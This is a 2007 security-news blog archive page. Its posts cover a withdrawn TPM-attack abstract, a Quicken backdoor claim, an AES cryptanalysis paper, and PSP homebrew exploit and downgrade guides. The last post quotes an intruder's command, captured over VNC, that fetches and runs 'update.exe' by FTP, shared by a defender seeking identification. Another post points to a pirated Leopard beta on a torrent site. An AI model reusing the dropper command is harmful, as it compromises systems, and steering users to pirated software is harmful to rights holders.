The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner

Archive for June, 2007

Black Hat paper on breaking Trusted Platform Module withdrawn

Posted by Xavier Ashe on June 29, 2007

This is the abstract for a paper that was scheduled to be presented at Black Hat USA 2007 security conference next month. It was removed without explanation from the conference Web site this week, and promised to circumvent security afforded by Trusted Platform Module chips:

“…The attack procedure (TPMkit) involves an attack on the TPM chip.
TPMkit lets you overcome technologies such as Vista's BitLocker. TPMkit
also bypasses remote attestation and thus, will allow to connect over
Trusted Network Connect(TNC) (although the system might not be in
Trusted state).

TPMkit bypasses the security checks mentioned (in the above paragraphs) and thus, you will never know that you are using a
compromised or changed system.

will be demonstrating how to break TPM. The demonstration would include
a few live demonstrations. For example, one demonstration will show how
to login and access data on a Windows Vista System (which has TPM +
BitLocker enabled).

More information on TPMkit (as it evolves) will be released.”

Read the full abstract on NetworkWorld.


Posted in Security | Leave a Comment »

Lumines sales jump 5900% on Amazon

Posted by Xavier Ashe on June 25, 2007

You may have already heard about the latest PSP exploit discovered within the classic puzzler Lumines,
availing owners of any variety of PSP — all the way up to its current
firmware, 3.50 — the opportunity to run homebrew, install custom
firmware, and generally monkey up Sony's plans to get you to play PSP
games on the system over, say, 14-year-old SNES games. Can't stop 'em,
Sony — this is what people want. People want their hardware unlocked,
they want emulation of everything up to PSX, and they don't want you
steppin' on their toes over it. Proof? Hell, look at Lumines.

a big jump for a launch title. Hey, I'm not saying it wasn't a great
game — it's certainly one of my all-time favorite titles to play on
the toilet, that's for certain — but I can't imagine a nearly 6000%
jump just for nostalgia or 'cos word got out that it wasn't half bad.

It's levelled off a bit since then, but still impressive — the force of a wall of gamers all moving towards emulation and maybe-probably piracy. Well, at least they'll actually play the damn things, now. Go buy Crush, jerks!

From Destructoid.

Posted in PSP Hacks | Leave a Comment »

Surf the Net Safely and Privately with JanusVM

Posted by Xavier Ashe on June 25, 2007

This morning, while having a little fun with VMWare Server, I stumbled on VMWare’s list of free virtualized environments.
If you have any VMWare product installed on your box, you’ll definitely
want to check this list out. Anyhow, like I already said, I stumbled on
this list and quickly browsed the available products. That’s when I
ended up on a very interesting security package named JanusVM.
JanusVM is a virtualized security environment that allows you to surf
the internet absolutely securely and privately. It was designed to run
on VMware Player (or Server) and brings together openVPN, Tor, Squid, Privoxy and dns-proxy-tor to give you a transparent layer of security that is compatible with most TCP based applications.

JanusVM Features:

  • WiFi Support.
  • Supports multiple users in a LAN.
  • Protects you from most man-in-the-middle attacks.
  • Protects you from Javascript, Java, and Flash based side-channel privacy attacks.
  • Protects your identity and your true location by masking your IP Address.
  • Encrypts and re-routes your DNS request and ALL TCP traffic to ensure strong privacy.
  • Strips out most privacy sensitive information your web browser may leak.
  • Blocks popups, annoying ads, banners, and other obnoxious Internet junk.
  • Very simple setup and operation.
  • Works transparently for applications using TCP.

Setup is very easy. Just download and install VMWare player, download JanusVM and follow these simple instructions.

After setting up the environment, if you decide to keep JanusVM running on your box, please consider giving a small donation to the developer. Your donations will surely encourage him to keep on working on this fantastic project.

Nice, I'm downloading this now.  Usually the presence of Tor on a corporate laptop is eyed suspiciously.  Found on Geeks are Sexy.

Posted in Privacy | Leave a Comment »

Quicken Backdoor Could Give Feds Access to Finance Data

Posted by Xavier Ashe on June 25, 2007

A Moscow-based
password-recovery vendor Thursday accused Intuit Inc. of hiding a
backdoor in its popular Quicken personal finance program that gives it
— and perhaps government agencies — access to users’ data files.

called the charges baseless, and said that although there is a way to
unlock Quicken’s encrypted data, it’s only used by the company’s
support team to help customers who have forgotten their passwords.

a statement, Elcomsoft Co. Ltd., a Russian maker of password-recovery
tools, said Quicken versions since 2003 have used strong encryption
designed to foil hackers. But those editions also have a backdoor that
unlocks the encryption with the 512-bit RSA key that Intuit controls.

is very unlikely that a casual hacker could have broken into Quicken’s
password protection regimen,” Vladimir Katalov, Elcomsoft’s CEO, said
in the statement. “[We] needed to use advanced decryption technology to
uncover Intuit’s undocumented and well-hidden backdoor, and to
successfully perform a factorization of their 512-bit RSA key.”

“Very unlikely…” my ass.  Read the full article at

Posted in Privacy, Security | Leave a Comment »

Run Homebrew on your PSP v3.50!!

Posted by Xavier Ashe on June 25, 2007

Following research in conjunction with Archaemic, Noobz are proud to
present the first ever all-firmware exploit for the PSP.  Based on
Lumines, the “Illuminati” exploit is a user-mode exploit using a buffer
overflow in the savedata file – similar to the GTA exploit.

That's right – if you've got a legal UMD
copy of Lumines, then you can run homebrew on your PSP – whatever the
firmware version.  That includes v3.50! Right now, the only homebrew is
the Hello World demo released below – but in future we intend to
release a HEN and downgrader.

To make the exploit work:

  • Check that you have an EU or
    US version of Lumines (ULES00043 or ULUS10002).  Currently we don't
    have a version for the Japanese version, but we're working on it, as
    soon as we get hold of a Japanese UMD. 
  • Extract the contents of the 'MS_ROOT' folder from the ZIP file into the top-level of your memory stick. (HINT: If you wind up with an 'MS_ROOT' folder on the stick, you've done it wrong).
  • Start
    the game, and as soon as it gets to the 'Press START' screen, press
    START.  If you wait until the demo has started, the exploit may not
  • The screen should go blank, and the exploit will start
    after a few moments.  It doesn't do anything except look pretty at this
    stage – but feel free to enjoy the first homebrew on your v3.10 – v3.50
    PSP Wink

 Download Illuminati exploit

File Size: 132.65 Kb
Downloads: 8501

From noobz.

Posted in PSP Hacks | Leave a Comment »

The Leopard has been let loose

Posted by Xavier Ashe on June 22, 2007

Arrrrrr. Avast Ye Matey! The cat is out of the bag. The WWDC 2007
beta of Leopard (Build 9A466) has hit the grand daddy of all torrent
sites. Just search for “The Big Cat” on The Pirate Bay and fire up your
favorite BitTorrent client.

For those of you who don’t want to cross over to the shady side of computing you can check out ThinkSecrets gallery.

From UNEASYsilence.

Posted in Security | Leave a Comment »

AES seems weak

Posted by Xavier Ashe on June 22, 2007

We describe a new simple but more powerful form of linear cryptanalysis. It appears to break AES (and undoubtedly other cryptosystems too, e.g. SKIPJACK). The break is “nonconstructive,” i.e. we make it plausible (e.g. prove it in certain approximate probabilistic models) that a small algorithm for quickly determining AES-256 keys from plaintext-ciphertext pairs exists – but without constructing the algorithm. The attack’s runtime is comparable to performing 64^w encryptions where w is the (unknown) minimum Hamming weight in certain binary linear error-correcting codes (BLECCs) associated with AES-256. If w < 43 then our attack is faster than exhaustive key search; probably w < 10. (Also there should be ciphertext-only attacks if the plaintext is natural English.)

Even if this break breaks due to the underlying models inadequately approximating the real world, we explain how AES still could contain “trapdoors” which would make cryptanalysis unexpectedly easy for anybody who knew the trapdoor. If AES’s designers had inserted such a trap door, it could be very easy for them to convince us of that.  But if none exist, then it is probably infeasible difficult for them to convince us of that.

We then discuss how to use the theory of BLECCs to build cryptosystems provably
1. not containing trapdoors of this sort,
2. secure against our strengthened form of linear cryptanalysis,
3. secure against “differential”cryptanalysis,
4. secure against D.J.Bernstein’s timing attack.

Using this technique we prove a fundamental theorem: it is possible to thus-encrypt n bits with security 2^cn , via an circuit Qn containing < cn two-input logic gates and operating in < c log n gate-delays, where the three cs denote (possibly different) positive constants and Qn is constructible in polynomial(n) time. At the end we give tables of useful binary codes.

Interesting paper from Warren D. Smith (pdf).

Posted in Security | Leave a Comment »

PSP firmware 3.03 downgrader

Posted by Xavier Ashe on June 19, 2007

Fanjita may have told you guys what to do with a non-homebrew capable PSP, but now it appears that everyone can get in on the homebrew fun! The “goofy exploit”
which exists in firmwares 2.00 to 3.03 was found on Friday, January 25,
2007, a date which you'd think might go down in the PSP homebrew
history. But it probably won't because despite their seven-day ETA, the
Noobz team has once again fortified its position at the top of the homebrew coding ladder with a 3.03 downgrader – just three days after the exploit was found!

Some call it magic, others call it an act of god, but whatever the reason for it, PSP gamers all across the world can now downgrade their consoles to the magic of homebrew-capable 1.5, and then if they wish to do so, upgrading to homebrew-capable custom firmware. All you need is a PSP running firmware 3.03 (if not then update to 3.03 using the update EBOOT found here) the downgrader files and the 1.50 EBOOT as well as an unpatched version of Grand Theft Auto: Liberty City Stories.

Unpatched versions of Liberty City Stories contain the 2.0 update, whereas patched versions contain higher updates. If your copy of LCS
has an update higher than 2.0 on it, then you will have to find an
unpatched UMD to proceed. There's no need to worry if you have a TA-082
PSP as the downgrader will check yourmotherboard and patch it if necessary. Note the downgrader will not let you proceed without patching if your motherboard requires it.

only has Noobz released a 3.03 downgrader but they've also managed to
release a 3.03 HEN (Homebrew Enabler) for the PSP. This means that
those of you who aren't too sure that you want to downgrade can still
play homebrew on 3.03. This does not flash your PSP, but by running
HEN, it installs a patch in your PSP's memory, that allows you to run
homebrew almost as if you had a v1.5 PSP. This patch remains in place
until you fully turn off your PSP – it will survive the PSP being
placed into sleep mode. You run the HEN application just as you do the
downgrader using Grand Theft Auto: Liberty City Stories.

use this simply download the 3.03 HEN files from the download links
below and copy them to your PSP. Then run your unpatched version of
GTA:LCS and the patch will apply itself. It will be stored inRAM and
will stay there until you reset your PSP. Putting the PSP in sleep mode
will not remove the patch. This is based on the source for HEN 2.71
provided by Dark_Alex, so the Noobz team would like to thank him for
the code and the help. Additional credits go to Booster, Team C + D for
the registry kernel exploit and Mathieulh for the help provided to

PLEASE READ: This downgrader has been tested by the highly-successful Noobz team and has been proven to work, however there is a small chance that bricking could occur during the process of downgrading.
QJ.Net and the Noobz team are not responsible for any damage which may
happen to your PSP by this application. Can you also note before use
that it is possible to brick using this downgrader if you downgrade and
then update to 3.03 and then downgrade again. The advice from Fanjita
right now is to only use this once. If you update to 3.03 again after
using the downgrader then we suggest you leave it there to prevent your
PSP from bricking.

Now we've got the boring bit over with, we
can move onto the downgrade process itself. Here's QJ's “how to” for
downgrading from 3.03 to 1.50:

1. Update to firmware 3.03. If already have this firmware then proceed to step 2.

2. Open the 3.03 downgrade file and copy the contents of the folder MS_ROOT to the root of your memory stick.

3. Open the 1.5 update and rename the EBOOT.PBP to UPDATE.PBP then copy it to /PSP/GAME/UPDATE/
Make sure not to overwrite PSP/GAME/UPDATE/EBOOT.PBP

4. Load Grand Theft Auto: Liberty City Stories (unpatched)

5. It should get to loading save game, clear the screen, the screen should fill with a light blue color and then reset the PSP .  (If this does not happen see below)

6. Check that HEN is running by going to system settings then System Information and it should show up as system version 303 HEN

7. If it is showing up as 3.03 HEN then go to the memory stick and run the x.yz update

8. Before the downgrader does anything to your PSP it will ask for you to agree to what it is doing.  If you no longer want to continue press the Right Shoulder Button (R-TRIGGER).

9. Once you have agreed to start the downgrade do not unplug the PSP

10. Once finished the PSP will ask you to press X, after pressing it will reset it self.

11. If it comes up saying that the settings are corrupt press X to continue.

12. Enjoy your new shiny 1.5 PSP.

What do you do once you have firmware 1.5? Well, you can either start downloading homebrew games from our QuickJump Downloads site and use DevHook to run your current homebrew games or use the more popular which is to upgrade to Dark_Alex's 3.03 OE-C Custom firmware. The friendly people over at our forums have even created an easy-to-follow installation guide for 3.03 OE-C
if you've never used custom firmware before. This will give you all the
features of 3.03 and the ability to play homebrew and PSX games too! It
doesn't get much better than this. [Updated Video of the downgrade process after the jump, thanks to demologik]

Download: [Noobz 3.03 Homebrew Enabler (HEN)]
Download: [Noobz 3.03 to 1.50 downgrader]
Download: [1.50 Update]
Discuss: [Official Downgrader Forums]
Read: [Official Downgrader FAQ]

Posted in PSP Hacks | Leave a Comment »

Microsoft Unwraps Security Platform

Posted by Xavier Ashe on June 6, 2007

Now that Microsoft's revealed its plans for a next-generation integrated security management platform, the heat is on. (See Microsoft Adds Next-Gen Forefront Roadmap.)

By developing a single, unified management platform — code-named
“Stirling” — for security from the server to the endpoint and the
edge, Microsoft has made what may be its most aggressive security play
yet, security experts say of the software giant's announcement at its
TechEd 2007 conference yesterday.

Stirling initially will work only with Microsoft's Forefront
products, but it eventually will expand to include the integration and
interoperability with third-party security vendors' products, says Paul
Bryan, a director of security and access product management for

By unifying its security tools with Stirling, Microsoft is
“channeling” IBM, says Enderle Group's Rob Enderle. “IBM traditionally
owned security for their offerings and they could integrate that
security solution into the other solutions they had to ensure SLAs were
maintained and disruption was minimized,” he says. “Microsoft is now
showcasing a similar strength, by approaching the problems
comprehensively and pushing for their integration into Microsoft's
overall ecosystem.”

The question is whether enterprises will follow the IBM old adage
with “no one ever got fired for buying” Microsoft. “The 'play it safe'
from an employment perspective buyer will now bounce between Microsoft,
CA, Symantec, McAfee, and Trend Micro,” says Randy Abrams, director of
technical education for Eset, and the former operations manager for
Microsoft's Global Infrastructure Alliance for Internet Safety. “All of
these players have enterprise management tools and enough name
recognition to qualify for safe purchasing under the 'buy IBM'

Read more on Dark Reading.

Posted in Security | Leave a Comment »

IBM Snaps up Watchfire

Posted by Xavier Ashe on June 6, 2007

IBM liked Watchfire's Web application security software so much it plans to buy the company for an undisclosed sum, it said

Watchfire develops software for identifying vulnerabilities in Web applications and for auditing sites for compliance with
regulations on corporate governance, data privacy, or accessibility.

IBM plans to fold the Waltham, Massachusetts, company into its Rational division, adding Watchfire's security compliance and
quality testing functions to Rational's software delivery tools.

two companies are no strangers: Watchfire's 800 customers include IBM,
Dell, Sun Microsystems, and a host of others in the financial,
pharmaceutical and entertainment industries. IBM's Global Services
division is also a partner and reseller, according to Watchfire.

developers of application security testing tools include Cenzic and SPI
Dynamics. Cenzic, in Santa Clara, California, has worked with
application development tool specialist Borland Software in the past,
and its current partners include IBM and Mercury Interactive, now a
subsidiary of Hewlett-Packard.

Watchfire developed its WebXM auditing tool in house, but obtained its flagship AppScan product through the acquisition of Sanctum in July 2004.

IBM expects to close the deal in the third quarter, subject to regulatory approval.

From Infoworld.  It makes sense that this goes to Rational, but I would have like for it to be in Tivoli just so I could have more toys to play with.  I sold Watchfire when I was an independent consultant.  I also was in the process of setting up a company I was working for as a partner for Watchfire.  So I really like their technology.  It's integrating security into your full life cycle development.  Very useful technology.

Posted in Security | Leave a Comment »

Anyone seen this?

Posted by Xavier Ashe on June 5, 2007

I've got a bastion hots that had vnc wide open.  I just got a connection.  It fired a ctrl-atl-del, opened a task manager, and ran cmd.exe.  It then executed the following command.  I was able to get a screen shot before the window disappeared, but it looked like the command was not successful.  The attackered disconnected immediately.  I have no extra users, but am downloading Helix right now to see if anything really happened.  I also have a pcap.  But does this look familiar to anyone?

cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij &echo binary >> ij &echo get update.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit

Posted in Main Page, Security | Leave a Comment »

%d bloggers like this: